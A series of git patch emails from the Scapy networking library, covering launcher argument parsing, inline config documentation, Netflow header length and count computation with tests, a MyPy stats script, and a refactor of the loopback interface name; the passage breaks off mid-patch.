a55b04efa523fb18d69572bee71308ff4d426f31 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sat, 4 Apr 2020 11:54:58 +0200 Subject: [PATCH 0076/1632] getopt replaced by shell operations --- run_scapy | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/run_scapy b/run_scapy index 4f103dc14ba..ce21208a155 100755 --- a/run_scapy +++ b/run_scapy @@ -2,16 +2,17 @@ DIR=$(dirname "$0") if [ -z "$PYTHON" ] then - ARGS=$(getopt 23 "$*" 2> /dev/null) - for arg in $ARGS + ARGS="" + for arg in "$@" do case $arg in - -2) PYTHON=python2; shift;; - -3) PYTHON=python3; shift;; - --) PYTHON=python3; break;; + -2) PYTHON=python2;; + -3) PYTHON=python3;; + *) ARGS="$ARGS $arg";; esac done + PYTHON=${PYTHON:-python3} fi $PYTHON --version > /dev/null 2>&1 if [ ! $? -eq 0 ] @@ -19,4 +20,4 @@ then echo "WARNING: '$PYTHON' not found, using 'python' instead." PYTHON=python fi -PYTHONPATH=$DIR exec "$PYTHON" -m scapy "$@" +PYTHONPATH=$DIR exec "$PYTHON" -m scapy $ARGS From c49cbe7606b588b6a039ac943a0d86e4c76a626c Mon Sep 17 00:00:00 2001 From: gpotter Date: Tue, 7 Apr 2020 18:13:31 +0200 Subject: [PATCH 0077/1632] Fix Conf to support Sphinx 3.0.0 --- doc/generate_docs.bat | 3 -- scapy/config.py | 98 +++++++++++++++++++++---------------------- 2 files changed, 49 insertions(+), 52 deletions(-) delete mode 100644 doc/generate_docs.bat diff --git a/doc/generate_docs.bat b/doc/generate_docs.bat deleted file mode 100644 index a9c7c98322e..00000000000 --- a/doc/generate_docs.bat +++ /dev/null @@ -1,3 +0,0 @@ -@echo off -cd .. -tox -e docs2 \ No newline at end of file diff --git a/scapy/config.py b/scapy/config.py index 95f5c4bbe26..0ac21a2290c 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -514,72 +514,44 @@ def _loglevel_changer(attr, val): class Conf(ConfClass): """ This object contains the configuration of Scapy. - - Attributes: - session: filename where the session will be saved - interactive_shell : can be "ipython", "python" or "auto". Default: Auto - stealth: if 1, prevents any unwanted packet to go out (ARP, DNS, ...) - checkIPID: if 0, doesn't check that IPID matches between IP sent and - ICMP IP citation received - if 1, checks that they either are equal or byte swapped - equals (bug in some IP stacks) - if 2, strictly checks that they are equals - checkIPsrc: if 1, checks IP src in IP and ICMP IP citation match - (bug in some NAT stacks) - checkIPinIP: if True, checks that IP-in-IP layers match. If False, do - not check IP layers that encapsulates another IP layer - check_TCPerror_seqack: if 1, also check that TCP seq and ack match the - ones in ICMP citation - iff: selects the default output interface for srp() and sendp(). - verb: level of verbosity, from 0 (almost mute) to 3 (verbose) - promisc: default mode for listening socket (to get answers if you - spoof on a lan) - sniff_promisc: default mode for sniff() - filter: bpf filter added to every sniffing socket to exclude traffic - from analysis - histfile: history file - padding: includes padding in disassembled packets - except_filter : BPF filter for packets to ignore - debug_match: when 1, store received packet that are not matched into - `debug.recv` - route: holds the Scapy routing table and provides methods to - manipulate it - warning_threshold : how much time between warnings from the same place - ASN1_default_codec: Codec used by default for ASN1 objects - mib: holds MIB direct access dictionary - resolve: holds list of fields for which resolution should be done - noenum: holds list of enum fields for which conversion to string - should NOT be done - AS_resolver: choose the AS resolver class to use - extensions_paths: path or list of paths where extensions are to be - looked for - contribs: a dict which can be used by contrib layers to store local - configuration - debug_tls: When 1, print some TLS session secrets - when they are computed. - recv_poll_rate: how often to check for new packets. Defaults to 0.05s. - raise_no_dst_mac: When True, raise exception if no dst MAC found - otherwise broadcast. Default is False. """ version = ReadOnlyAttribute("version", VERSION) - session = "" + session = "" #: filename where the session will be saved interactive = False + #: can be "ipython", "python" or "auto". Default: Auto interactive_shell = "" + #: if 1, prevents any unwanted packet to go out (ARP, DNS, ...) stealth = "not implemented" + #: selects the default output interface for srp() and sendp(). iface = None layers = LayersList() commands = CommandsList() + ASN1_default_codec = None #: Codec used by default for ASN1 objects + AS_resolver = None #: choose the AS resolver class to use dot15d4_protocol = None # Used in dot15d4.py logLevel = Interceptor("logLevel", log_scapy.level, _loglevel_changer) + #: if 0, doesn't check that IPID matches between IP sent and + #: ICMP IP citation received + #: if 1, checks that they either are equal or byte swapped + #: equals (bug in some IP stacks) + #: if 2, strictly checks that they are equals checkIPID = False + #: if 1, checks IP src in IP and ICMP IP citation match + #: (bug in some NAT stacks) checkIPsrc = True checkIPaddr = True + #: if True, checks that IP-in-IP layers match. If False, do + #: not check IP layers that encapsulates another IP layer checkIPinIP = True + #: if 1, also check that TCP seq and ack match the + #: ones in ICMP citation check_TCPerror_seqack = False - verb = 2 + verb = 2 #: level of verbosity, from 0 (almost mute) to 3 (verbose) prompt = Interceptor("prompt", ">>> ", _prompt_changer) + #: default mode for listening socket (to get answers if you + #: spoof on a lan) promisc = True - sniff_promisc = 1 + sniff_promisc = 1 #: default mode for sniff() raw_layer = None raw_summary = False default_l2 = None @@ -592,27 +564,48 @@ class Conf(ConfClass): BTsocket = None USBsocket = None min_pkt_size = 60 + mib = None #: holds MIB direct access dictionary bufsize = 2**16 + #: history file histfile = os.getenv('SCAPY_HISTFILE', os.path.join(os.path.expanduser("~"), ".scapy_history")) + #: includes padding in disassembled packets padding = 1 + #: BPF filter for packets to ignore except_filter = "" + #: bpf filter added to every sniffing socket to exclude traffic + #: from analysis + filter = "" + #: when 1, store received packet that are not matched into `debug.recv` debug_match = False + #: When 1, print some TLS session secrets when they are computed. debug_tls = False wepkey = "" cache_iflist = {} + #: holds the Scapy IPv4 routing table and provides methods to + #: manipulate it route = None # Filed by route.py + #: holds the Scapy IPv6 routing table and provides methods to + #: manipulate it route6 = None # Filed by route6.py auto_fragment = True + #: raise exception when a packet dissector raises an exception debug_dissector = False color_theme = Interceptor("color_theme", NoTheme(), _prompt_changer) + #: how much time between warnings from the same place warning_threshold = 5 prog = ProgPath() + #: holds list of fields for which resolution should be done resolve = Resolve() + #: holds list of enum fields for which conversion to string + #: should NOT be done noenum = Resolve() emph = Emphasize() + #: read only attribute to show if PyPy is in use use_pypy = ReadOnlyAttribute("use_pypy", isPyPy()) + #: use libpcap integration or not. Changing this value will update + #: the conf.L[2/3] sockets use_pcap = Interceptor( "use_pcap", os.getenv("SCAPY_USE_PCAPDNET", "").lower().startswith("y"), @@ -621,6 +614,7 @@ class Conf(ConfClass): use_bpf = Interceptor("use_bpf", False, _socket_changer) use_npcap = False ipv6_enabled = socket.has_ipv6 + #: path or list of paths where extensions are to be looked for extensions_paths = "." stats_classic_protocols = [] stats_dot11_protocols = [] @@ -635,12 +629,18 @@ class Conf(ConfClass): 'netflow', 'ntp', 'ppi', 'ppp', 'pptp', 'radius', 'rip', 'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'snmp', 'tftp', 'vrrp', 'vxlan', 'x509', 'zigbee'] + #: a dict which can be used by contrib layers to store local + #: configuration contribs = dict() crypto_valid = isCryptographyValid() crypto_valid_advanced = isCryptographyAdvanced() fancy_prompt = True auto_crop_tables = True + #: how often to check for new packets. + #: Defaults to 0.05s. recv_poll_rate = 0.05 + #: When True, raise exception if no dst MAC found otherwise broadcast. + #: Default is False. raise_no_dst_mac = False def __getattr__(self, attr): From 89202c11e5edfe3d422c345248603a5ce77292c7 Mon Sep 17 00:00:00 2001 From: Ivan Balan Date: Thu, 26 Mar 2020 15:35:48 +0200 Subject: [PATCH 0078/1632] Add NetflowHeaderV10 "length" and NetflowHeaderV1/NetflowHeaderV5 "count" computations (#2544) --- scapy/layers/netflow.py | 22 ++++++++++++++++++++-- 1 file changed, 20 insertions(+), 2 deletions(-) diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index 3f4740eb417..329b5876839 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -67,11 +67,17 @@ class NetflowHeader(Packet): class NetflowHeaderV1(Packet): name = "Netflow Header v1" - fields_desc = [ShortField("count", 0), + fields_desc = [ShortField("count", None), IntField("sysUptime", 0), UTCTimeField("unixSecs", 0), UTCTimeField("unixNanoSeconds", 0, use_nano=True)] + def post_build(self, pkt, pay): + if self.count is None: + count = len(self.layers()) - 1 + pkt = struct.pack("!H", count) + pkt[2:] + return pkt + pay + class NetflowRecordV1(Packet): name = "Netflow Record v1" @@ -105,7 +111,7 @@ class NetflowRecordV1(Packet): class NetflowHeaderV5(Packet): name = "Netflow Header v5" - fields_desc = [ShortField("count", 0), + fields_desc = [ShortField("count", None), IntField("sysUptime", 0), UTCTimeField("unixSecs", 0), UTCTimeField("unixNanoSeconds", 0, use_nano=True), @@ -114,6 +120,12 @@ class NetflowHeaderV5(Packet): ByteField("engineID", 0), ShortField("samplingInterval", 0)] + def post_build(self, pkt, pay): + if self.count is None: + count = len(self.layers()) - 1 + pkt = struct.pack("!H", count) + pkt[2:] + return pkt + pay + class NetflowRecordV5(Packet): name = "Netflow Record v5" @@ -1246,6 +1258,12 @@ class NetflowHeaderV10(Packet): IntField("flowSequence", 0), IntField("ObservationDomainID", 0)] + def post_build(self, pkt, pay): + if self.length is None: + length = len(pkt) + len(pay) + pkt = struct.pack("!H", length) + pkt[2:] + return pkt + pay + class NetflowTemplateFieldV9(Packet): name = "Netflow Flowset Template Field V9/10" From 4befa3145bfbc137c103300e61847d21a11847a7 Mon Sep 17 00:00:00 2001 From: Ivan Balan Date: Mon, 6 Apr 2020 09:47:07 +0300 Subject: [PATCH 0079/1632] Issue_#2544 Unit tests for Netflow headers count/length computations --- test/regression.uts | 44 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) diff --git a/test/regression.uts b/test/regression.uts index ade8269bab5..6e8c516654e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -6713,6 +6713,9 @@ raw(NetflowRecordV5(dst="192.168.0.1")) == b'\x7f\x00\x00\x01\xc0\xa8\x00\x01\x0 raw(NetflowHeader()/NetflowHeaderV5(count=1)/NetflowRecordV5(dst="192.168.0.1")) == b'\x00\x05\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(NetflowHeader()/NetflowHeaderV5()/NetflowRecordV5(dst="192.168.0.1")/NetflowRecordV5(dst="172.16.0.1")) == b'\x00\x05\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xc0\xa8\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\xac\x10\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00' + + = NetflowHeaderV5 - UDP bindings s = raw(IP(src="127.0.0.1")/UDP()/NetflowHeader()/NetflowHeaderV5()) @@ -6818,6 +6821,10 @@ dataFS = NetflowDataflowsetV9( ), ], ) + +pkt = netflow_header / flowset / dataFS +assert raw(pkt) == b'\x00\t\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x00\x00\x14\x12\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x00\x00' + pkt = header / netflow_header / flowset / dataFS pkt = netflowv9_defragment(Ether(raw(pkt)))[0] @@ -6895,6 +6902,43 @@ pkt4 = NetflowTemplateV9(s) assert len(pkt4.template_fields) == pkt4.fieldCount assert sum([template.fieldLength for template in pkt4.template_fields]) == 124 += NetflowV10/IPFIX - build + +netflow_header = NetflowHeader()/NetflowHeaderV10() + +flowset = NetflowFlowsetV9( + templates=[NetflowTemplateV9( + template_fields=[ + NetflowTemplateFieldV9(fieldType=1, fieldLength=1), # IN_BYTES + NetflowTemplateFieldV9(fieldType=2, fieldLength=4), # IN_PKTS + NetflowTemplateFieldV9(fieldType=4), # PROTOCOL + NetflowTemplateFieldV9(fieldType=8), # IPV4_SRC_ADDR + NetflowTemplateFieldV9(fieldType=12), # IPV4_DST_ADDR + ], + templateID=256, + fieldCount=5) + ], + flowSetID=0 +) +recordClass = GetNetflowRecordV9(flowset) +dataFS = NetflowDataflowsetV9( + templateID=256, + records=[ # Some random data. + recordClass( + IN_BYTES=b"\x12", + IN_PKTS=b"\0\0\0\0", + PROTOCOL=6, + IPV4_SRC_ADDR="192.168.0.10", + IPV4_DST_ADDR="192.168.0.11" + ), + ], +) + +pkt = netflow_header / flowset / dataFS +assert raw(pkt) == b'\x00\n\x00>\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x01\x00\x00\x05\x00\x01\x00\x01\x00\x02\x00\x04\x00\x04\x00\x01\x00\x08\x00\x04\x00\x0c\x00\x04\x01\x00\x00\x14\x12\x00\x00\x00\x00\x06\xc0\xa8\x00\n\xc0\xa8\x00\x0b\x00\x00' + + + ############ ############ + pcap / pcapng format support From d7e4a03beb5d08d12f5b179bd5d880f72fab9a5a Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 9 Apr 2020 12:09:42 +0200 Subject: [PATCH 0080/1632] Negociate exception added --- .config/codespell_ignore.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index cc318d530cb..03b2a822adf 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -11,6 +11,7 @@ fo iff mitre nd +negociate ot referer ser From c856dcfc29f8167793af17cab8703dae2ebb9a07 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 13 Dec 2019 17:23:39 +0000 Subject: [PATCH 0081/1632] MyPy stats --- .config/mypy/mypy_check.py | 6 ++-- .config/mypy/mypy_deployment_stats.py | 51 +++++++++++++++++++++++++++ 2 files changed, 55 insertions(+), 2 deletions(-) create mode 100644 .config/mypy/mypy_deployment_stats.py diff --git a/.config/mypy/mypy_check.py b/.config/mypy/mypy_check.py index cb313e6e69d..0ae1c3c824d 100644 --- a/.config/mypy/mypy_check.py +++ b/.config/mypy/mypy_check.py @@ -25,7 +25,9 @@ # Load files -with io.open("./.config/mypy/mypy_enabled.txt") as fd: +localdir = os.path.split(__file__)[0] + +with io.open(os.path.join(localdir, "mypy_enabled.txt")) as fd: FILES = [l.strip() for l in fd.readlines() if l.strip() and l[0] != "#"] if not FILES: @@ -39,7 +41,7 @@ "--follow-imports=skip", "--config-file=" + os.path.abspath( os.path.join( - os.path.split(__file__)[0], + localdir, "mypy.ini" ) ) diff --git a/.config/mypy/mypy_deployment_stats.py b/.config/mypy/mypy_deployment_stats.py new file mode 100644 index 00000000000..ffd341cd6e2 --- /dev/null +++ b/.config/mypy/mypy_deployment_stats.py @@ -0,0 +1,51 @@ +# This file is part of Scapy +# See https://scapy.net for more information +# Copyright (C) Gabriel Potter +# This program is published under a GPLv2 license + +""" +Generate MyPy deployment stats +""" + +import os +import io +import glob +from collections import defaultdict + +# Parse config file + +localdir = os.path.split(__file__)[0] + +with io.open(os.path.join(localdir, "mypy_enabled.txt")) as fd: + FILES = [l.strip() for l in fd.readlines() if l.strip() and l[0] != "#"] + +# Scan Scapy + +ALL_FILES = [ + "".join(x.partition("scapy/")[1:]) for x in + glob.iglob('../../scapy/**/*.py', recursive=True) +] + +# Process + +TOTAL = len(ALL_FILES) +ENABLED = 0 +MODULES = defaultdict(lambda: (0, [])) + +for f in ALL_FILES: + parts = f.split("/") + if len(parts) > 2: + mod = parts[1] + else: + mod = "[main]" + e, l = MODULES[mod] + if f in FILES: + ENABLED += 1 + e += 1 + l.append(f) + MODULES[mod] = (e, l) + +print("*The numbers correspond to the ammount of files processed*") +print("**MyPy Support: %.2f%%**" % (ENABLED / TOTAL * 100)) +for mod, dat in MODULES.items(): + print("- `%s`: %.2f%%" % (mod, dat[0] / len(dat[1]) * 100)) From 64f84546fbeb69d119d36ba79120ddd175d41be9 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 9 Apr 2020 11:32:40 +0200 Subject: [PATCH 0082/1632] Typo fixed --- .config/mypy/mypy_deployment_stats.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.config/mypy/mypy_deployment_stats.py b/.config/mypy/mypy_deployment_stats.py index ffd341cd6e2..170664fbb76 100644 --- a/.config/mypy/mypy_deployment_stats.py +++ b/.config/mypy/mypy_deployment_stats.py @@ -45,7 +45,7 @@ l.append(f) MODULES[mod] = (e, l) -print("*The numbers correspond to the ammount of files processed*") +print("*The numbers correspond to the amount of files processed*") print("**MyPy Support: %.2f%%**" % (ENABLED / TOTAL * 100)) for mod, dat in MODULES.items(): print("- `%s`: %.2f%%" % (mod, dat[0] / len(dat[1]) * 100)) From 290d0d26bbc158471ccca3a722fde90215fd9a43 Mon Sep 17 00:00:00 2001 From: gpotter Date: Sat, 4 Apr 2020 22:02:14 +0200 Subject: [PATCH 0083/1632] Move scapy.consts.LOOPBACK_NAME to conf.loopback_name --- scapy/arch/__init__.py | 3 +- scapy/arch/bpf/core.py | 7 +- scapy/arch/linux.py | 20 ++-- scapy/arch/pcapdnet.py | 2 +- scapy/arch/solaris.py | 3 +- scapy/arch/unix.py | 4 +- scapy/arch/windows/__init__.py | 196 +++++++++++++++++---------------- scapy/automaton.py | 6 +- scapy/config.py | 1 + scapy/consts.py | 17 +-- scapy/layers/inet6.py | 5 +- scapy/layers/l2.py | 2 +- scapy/route.py | 9 +- scapy/route6.py | 9 +- scapy/sendrecv.py | 2 +- scapy/tools/UTscapy.py | 4 +- scapy/utils6.py | 3 +- test/bpf.uts | 6 +- test/linux.uts | 10 +- test/regression.uts | 50 +++++---- 20 files changed, 175 insertions(+), 184 deletions(-) diff --git a/scapy/arch/__init__.py b/scapy/arch/__init__.py index 344db1f2ae8..eab1ae9a22b 100644 --- a/scapy/arch/__init__.py +++ b/scapy/arch/__init__.py @@ -10,7 +10,6 @@ from __future__ import absolute_import import socket -import scapy.consts from scapy.consts import LINUX, SOLARIS, WINDOWS, BSD from scapy.error import Scapy_Exception from scapy.config import conf, _set_conf_sockets @@ -68,7 +67,7 @@ def get_if_hwaddr(iff): from scapy.arch.windows.native import * # noqa F403 if conf.iface is None: - conf.iface = scapy.consts.LOOPBACK_INTERFACE + conf.iface = conf.loopback_name _set_conf_sockets() # Apply config diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index 3dc91ce9bd0..0ebdb53162b 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -20,7 +20,6 @@ from scapy.arch.common import get_if, compile_filter from scapy.compat import plain_str from scapy.config import conf -from scapy.consts import LOOPBACK_NAME from scapy.data import ARPHDR_LOOPBACK, ARPHDR_ETHER from scapy.error import Scapy_Exception, warning from scapy.modules.six.moves import range @@ -71,7 +70,7 @@ def get_if_raw_hwaddr(ifname): NULL_MAC_ADDRESS = b'\x00' * 6 # Handle the loopback interface separately - if ifname == LOOPBACK_NAME: + if ifname == conf.loopback_name: return (ARPHDR_LOOPBACK, NULL_MAC_ADDRESS) # Get ifconfig output @@ -164,7 +163,7 @@ def get_working_ifaces(): for ifname in get_if_list(): # Unlike pcap_findalldevs(), we do not care of loopback interfaces. - if ifname == LOOPBACK_NAME: + if ifname == conf.loopback_name: continue # Get interface flags @@ -208,5 +207,5 @@ def get_working_if(): ifaces = get_working_ifaces() if not ifaces: # A better interface will be selected later using the routing table - return LOOPBACK_NAME + return conf.loopback_name return ifaces[0] diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index 3f14e890651..4abe14e3967 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -22,7 +22,7 @@ import subprocess from scapy.compat import raw, plain_str -from scapy.consts import LOOPBACK_NAME, LINUX +from scapy.consts import LINUX import scapy.utils import scapy.utils6 from scapy.packet import Packet, Padding @@ -124,12 +124,12 @@ def get_working_if(): Return the name of the first network interfcace that is up. """ for i in get_if_list(): - if i == LOOPBACK_NAME: + if i == conf.loopback_name: continue ifflags = struct.unpack("16xH14x", get_if(i, SIOCGIFFLAGS))[0] if ifflags & IFF_UP: return i - return LOOPBACK_NAME + return conf.loopback_name def attach_filter(sock, bpf_filter, iface): @@ -213,21 +213,21 @@ def read_routes(): routes = [] s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: - ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", scapy.consts.LOOPBACK_NAME.encode("utf8"))) # noqa: E501 + ifreq = ioctl(s, SIOCGIFADDR, struct.pack("16s16x", conf.loopback_name.encode("utf8"))) # noqa: E501 addrfamily = struct.unpack("h", ifreq[16:18])[0] if addrfamily == socket.AF_INET: - ifreq2 = ioctl(s, SIOCGIFNETMASK, struct.pack("16s16x", scapy.consts.LOOPBACK_NAME.encode("utf8"))) # noqa: E501 + ifreq2 = ioctl(s, SIOCGIFNETMASK, struct.pack("16s16x", conf.loopback_name.encode("utf8"))) # noqa: E501 msk = socket.ntohl(struct.unpack("I", ifreq2[20:24])[0]) dst = socket.ntohl(struct.unpack("I", ifreq[20:24])[0]) & msk ifaddr = scapy.utils.inet_ntoa(ifreq[20:24]) - routes.append((dst, msk, "0.0.0.0", scapy.consts.LOOPBACK_NAME, ifaddr, 1)) # noqa: E501 + routes.append((dst, msk, "0.0.0.0", conf.loopback_name, ifaddr, 1)) # noqa: E501 else: - warning("Interface %s: unknown address family (%i)" % (scapy.consts.LOOPBACK_NAME, addrfamily)) # noqa: E501 + warning("Interface %s: unknown address family (%i)" % (conf.loopback_name, addrfamily)) # noqa: E501 except IOError as err: if err.errno == 99: - warning("Interface %s: no address assigned" % scapy.consts.LOOPBACK_NAME) # noqa: E501 + warning("Interface %s: no address assigned" % conf.loopback_name) # noqa: E501 else: - warning("Interface %s: failed to get address config (%s)" % (scapy.consts.LOOPBACK_NAME, str(err))) # noqa: E501 + warning("Interface %s: failed to get address config (%s)" % (conf.loopback_name, str(err))) # noqa: E501 for line in f.readlines()[1:]: line = plain_str(line) @@ -343,7 +343,7 @@ def proc2r(p): nh = proc2r(nh) cset = [] # candidate set (possible source addresses) - if dev == LOOPBACK_NAME: + if dev == conf.loopback_name: if d == '::': continue cset = ['::1'] diff --git a/scapy/arch/pcapdnet.py b/scapy/arch/pcapdnet.py index 41bdec7b0d4..4211d6f2247 100644 --- a/scapy/arch/pcapdnet.py +++ b/scapy/arch/pcapdnet.py @@ -177,7 +177,7 @@ def load_winpcapy(): "Please use Npcap instead") elif b"npcap" in version.lower(): conf.use_npcap = True - LOOPBACK_NAME = scapy.consts.LOOPBACK_NAME = "Npcap Loopback Adapter" # noqa: E501 + conf.loopback_name = conf.loopback_name = "Npcap Loopback Adapter" # noqa: E501 if conf.use_pcap: def get_if_list(): diff --git a/scapy/arch/solaris.py b/scapy/arch/solaris.py index b450c3d5dfb..3ae20917966 100644 --- a/scapy/arch/solaris.py +++ b/scapy/arch/solaris.py @@ -8,7 +8,6 @@ """ import socket -import scapy.consts from scapy.config import conf conf.use_pcap = True @@ -32,5 +31,5 @@ def get_working_if(): iface = min(conf.route.routes, key=lambda x: x[1])[3] except ValueError: # no route - iface = scapy.consts.LOOPBACK_INTERFACE + iface = conf.loopback_name return iface diff --git a/scapy/arch/unix.py b/scapy/arch/unix.py index 244ddd07c71..dd2aa40266c 100644 --- a/scapy/arch/unix.py +++ b/scapy/arch/unix.py @@ -14,7 +14,7 @@ import scapy.utils from scapy.arch import get_if_addr from scapy.config import conf -from scapy.consts import FREEBSD, NETBSD, OPENBSD, SOLARIS, LOOPBACK_NAME +from scapy.consts import FREEBSD, NETBSD, OPENBSD, SOLARIS from scapy.error import warning, log_interactive from scapy.pton_ntop import inet_pton from scapy.utils6 import in6_getscope, construct_source_candidate_set @@ -339,7 +339,7 @@ def read_routes6(): # Note: multicast routing is handled in Route6.route() continue - if LOOPBACK_NAME in dev: + if conf.loopback_name in dev: # Handle ::1 separately cset = ["::1"] next_hop = "::" diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index dd14c0aba0e..7ba6e5a0ddf 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -11,13 +11,12 @@ from __future__ import absolute_import from __future__ import print_function import os +import platform as platform_lib import socket import subprocess as sp from glob import glob import struct -import scapy -import scapy.consts from scapy.arch.windows.structures import _windows_title, \ GetAdaptersAddresses, GetIpForwardTable, GetIpForwardTable2, \ get_service_status @@ -39,6 +38,19 @@ from scapy.arch import pcapdnet # noqa: E402 from scapy.arch.pcapdnet import NPCAP_PATH, get_if_list # noqa: E402 +# Detection happens after pcapdnet import (NPcap detection) +NPCAP_LOOPBACK_NAME = r"\Device\NPF_Loopback" +if conf.use_npcap: + conf.loopback_name = NPCAP_LOOPBACK_NAME +else: + try: + if float(platform_lib.release()) >= 8.1: + conf.loopback_name = "Microsoft KM-TEST Loopback Adapter" + else: + conf.loopback_name = "Microsoft Loopback Adapter" + except ValueError: + conf.loopback_name = "Microsoft Loopback Adapter" + # hot-patching socket for missing variables on Windows if not hasattr(socket, 'IPPROTO_IPIP'): socket.IPPROTO_IPIP = 4 @@ -305,6 +317,7 @@ class NetworkInterface(object): def __init__(self, data=None): self.name = None self.ip = None + self.ip6 = None self.mac = None self.pcap_name = None self.description = None @@ -324,6 +337,7 @@ def update(self, data): """ self.data = data self.name = data['name'] + self.pcap_name = data['pcap_name'] self.description = data['description'] self.win_index = data['win_index'] self.guid = data['guid'] @@ -331,51 +345,42 @@ def update(self, data): self.ipv4_metric = data['ipv4_metric'] self.ipv6_metric = data['ipv6_metric'] self.ips = data['ips'] - if 'invalid' in data: - self.invalid = data['invalid'] - # Other attributes are optional - self._update_pcapdata() + self.flags = data['flags'] + self.invalid = data['invalid'] try: # Npcap loopback interface - if conf.use_npcap: - pcap_name_loopback = _get_npcap_config("LoopbackAdapter") - if pcap_name_loopback: # May not be defined - guid = _pcapname_to_guid(pcap_name_loopback) - if self.guid == guid: - # https://nmap.org/npcap/guide/npcap-devguide.html - self.mac = "00:00:00:00:00:00" - self.ip = "127.0.0.1" - return + if conf.use_npcap and self.pcap_name == NPCAP_LOOPBACK_NAME: + # https://nmap.org/npcap/guide/npcap-devguide.html + self.mac = "00:00:00:00:00:00" + self.ip = "127.0.0.1" + self.ip6 = "::1" + return except KeyError: pass - try: - self.ip = next(x for x in self.ips if ":" not in x) - except StopIteration: - pass + # Chose main IPv4 + if self.ips: + try: + self.ip = next(x for x in self.ips if ":" not in x) + except StopIteration: + pass + try: + self.ip6 = next(x for x in self.ips if ":" in x) + except IndexError: + pass + if not self.ip and not self.ip6: + self.invalid = True - try: - # Windows native loopback interface - if not self.ip and self.name == scapy.consts.LOOPBACK_NAME: - self.ip = "127.0.0.1" - except (KeyError, AttributeError, NameError) as e: - print(e) + def __hash__(self): + return hash(self.guid) - def _update_pcapdata(self): - # https://github.com/nmap/nmap/issues/1422 - # Lookup for the Winpcap/Npcap pcap_name according to the GUID - if self.is_invalid(): - return - for pcap_name, if_data in six.iteritems(conf.cache_iflist): - _, ips, flags = if_data - if pcap_name.endswith(self.guid): - self.pcap_name = pcap_name - self.flags = flags - self.ips.extend(x for x in ips if x not in self.ips) - return - # No matching pcap_name found: won't be able to sniff on it - self.invalid = True + def __eq__(self, other): + if isinstance(other, str): + return self.name == other or self.pcap_name == other + if isinstance(other, NetworkInterface): + return self.data == other.data + return object.__eq__(self, other) def is_invalid(self): return self.invalid @@ -384,8 +389,6 @@ def _check_npcap_requirement(self): if not conf.use_npcap: raise OSError("This operation requires Npcap.") if self.raw80211 is None: - # The Dot11Adapters is not officially supported anymore. - # we just try/except, and check that it exists globally val = _get_npcap_config("Dot11Support") self.raw80211 = bool(int(val)) if val else False if not self.raw80211: @@ -642,45 +645,45 @@ def load(self): # Try a restart NetworkInterfaceDict._pcap_check() + windows_interfaces = dict() for i in get_windows_if_list(): - try: - interface = NetworkInterface(i) - self.data[interface.guid] = interface - except KeyError: - pass - - # Remove invalid loopback interfaces (not usable) - for key, iface in self.data.copy().items(): - if iface.ip == "127.0.0.1" and iface.is_invalid(): - del self.data[key] + # Detect Loopback interface + if "Loopback" in i['name']: + i['name'] = conf.loopback_name + if i['guid']: + if conf.use_npcap and i['name'] == conf.loopback_name: + i['guid'] = NPCAP_LOOPBACK_NAME + windows_interfaces[i['guid']] = i - # Replace LOOPBACK_INTERFACE - try: - scapy.consts.LOOPBACK_INTERFACE = self.dev_from_name( - scapy.consts.LOOPBACK_NAME, - ) - except ValueError: - pass - # Support non-windows cards (e.g. Napatech) index = 0 for pcap_name, if_data in six.iteritems(conf.cache_iflist): - name, _, _ = if_data + name, ips, flags = if_data guid = _pcapname_to_guid(pcap_name) - if guid not in self.data: + data = windows_interfaces.get(guid, None) + if data: + # Exists in Windows registry + data['pcap_name'] = pcap_name + data['ips'].extend(ips) + data['flags'] = flags + data['invalid'] = False + else: + # Only in [Wi]npcap index -= 1 - dummy_data = { + data = { 'name': name, - 